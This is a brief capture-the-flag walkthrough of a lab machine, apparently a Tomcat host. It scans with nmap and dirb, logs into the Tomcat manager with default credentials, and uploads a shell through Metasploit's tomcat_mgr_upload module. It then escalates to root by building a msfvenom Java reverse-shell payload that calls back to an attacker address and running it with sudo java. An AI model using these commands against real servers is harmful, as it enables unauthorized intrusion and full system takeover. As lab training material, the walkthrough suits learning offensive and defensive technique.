Scanning the host with nmap –A –T4 –p- 192.168.1.10

And with dirb http://192.168.1.10

The page http://192.168.1.10:8080/manager/html we can access it using the default credentials tomcat:tomcat

Ok now that we can login, we can use Msfconsole to upload a shell, use exploit/multi/http/tomcat_mgr_upload

Ok now running LinEnum.sh script gave me a lot of informations:


We’re going to create a jar exploit like this :
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=3333 -f raw -o exploit.jar
Then transfer the file to the target and we rung this command:
sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar exploit.jar
And we get a shell as root

Navigate to the root folder and catch the flag:
